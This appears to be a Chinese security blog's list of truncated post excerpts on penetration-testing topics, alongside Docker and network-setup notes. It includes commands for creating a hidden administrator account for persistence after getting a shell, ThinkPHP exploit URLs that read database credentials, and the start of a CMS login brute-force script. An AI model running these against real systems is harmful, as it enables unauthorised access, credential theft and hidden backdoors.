weixin_39216626的博客

原创 OWASP TOP 10

OWASP TOP 10OWASP 是一个开放的Web安全社区，影响着Web安全的方方面面，OWASP每隔一段时间就会整理更新一次 “Top 10” 的Web漏洞排名，对当前实际环境常见的漏洞进行罗列，虽然漏洞排名经常引起业界的争议，但是在开源环境下，该计划公布的漏洞也能够客观反映实际场景中的某些问题。1、注入用一个不严谨的说法来形容注入攻击，就是，本应该处理用户输入字符的代码，将 用户输入...

原创 Dedecms 后台自动识别验证码爆破脚本

#!/usr/bin/env python# -*- coding:utf-8 -*-import requestsimport pytesseractfrom PIL import Imageimport re class DedeCMSLogin: def __init__(self, userid, pwd): self.vdcode = "" self.userid = userid self.pwd = pwd

原创 如何防止ip被ban

一、建立高匿ip地址池（1）什么是虚拟ip虚拟ip 是指由总部（mdlan）指定总部空闲的一段ip 作为移动用户接入时的虚拟ip 池。当移动用户接入后，分配一个虚拟ip 给移动用户，移动用户对总部的任何操作都是以分配的ip 作为源ip、就完全和在总部局域网内一样。例如使用虚拟ip 的移动接入后，可以访问总部局域网内的任何一台计算机，即使该计算机没有把网关指向总部（mdlan）；可以为接入的移动...

原创 Kali工具信息收集

Kali工具信息收集一、DNS信息收集1、fierce介绍，在一个安全的环境中，暴力破解DNS的方式是一种获取不连续IP地址空间主机的有效手段。fierce工具可以满足这样的需求，而且已经预装在Kali Linux中。fierce是RSnake创立的快速有效地DNS暴力破解工具。fierce工具首先根据域名的IP地址，查询相关的域名服务器，然后利用字典进行攻击。2、dnsdist6dns...

原创 权限维持-隐藏用户

获取shell后，使用以下方式可进行权限维持net user test$ somepasswordhere /add /ynet localgroup administrators test$ /addnet localgroup "remote desktop users" test$ /add使用该账号密码，成功登录用户名后添加 $ 在 cmd 里使用 net user 查看时是可...

原创 Windows提权常用命令

Windows提权1、whoami查看当前权限，当不是administrator或者system时需要提权2、ipconfig，查看服务器为内网还是外网，内网进服务器则需要转发端口3、quser查看管理是否在线4、systeminfo查看服务器信息及相应的补丁，可找相应的补丁提权5、tasklist查看当前运行的进程，是否有av，可利用的第三方的服务提权等6、net user查看用户，...

原创 常见的正则表达式

原创 Docker常用命令

docker load -i base01 载入镜像文件docker images 查看镜像iddocker run -p 1300:80 -d 镜像id 运行镜像创建容器docker ps -a 查看容器镜进程docker exec -it 容器id /bin/bash 进入容器池docker cp www 容器id:webpen 拷贝文件在容器（文件夹加-r...

原创 thinkphp漏洞集合

Thinkphp 5.0.22http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.usernamehttp://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.passwordhttp://url/to/th...

原创 phpscrew解密脚本

# coding:utf-8import osimport shutilimport zlibPM9SCREW = b'\tPM9SCREW\t'PM9SCREW_LEN = len(PM9SCREW)pm9screw_mycryptkey = [11152, 368, 192, 1281, 62]cryptkey_len = len(pm9screw_mycryptkey)...

原创 python批量判断网站状态码脚本

import requestsrequests.packages.urllib3.disable_warnings()file = open('lujing.txt')while 1 : line = file.readline() print(line) code=requests.get(line.strip(),verify=False).status_code...

原创 Ubuntu14.0 桥接模式静态IP设置

Ubuntu14.0 桥接模式静态IP设置一、虚拟机->设置在网络适配器处将连接状态修改为桥接模式，并且复制物理机网络连接状态。二、在物理机打开cmd，查看物理机网络连接状态，命令：ipconfig /all。查看物理机当前网络连接属性（名称，ip地址，子网掩码，网关，DNS）。在这里，我物理采用的是WLAN连接，并且名称为Intel® Dual Band Wireless-A...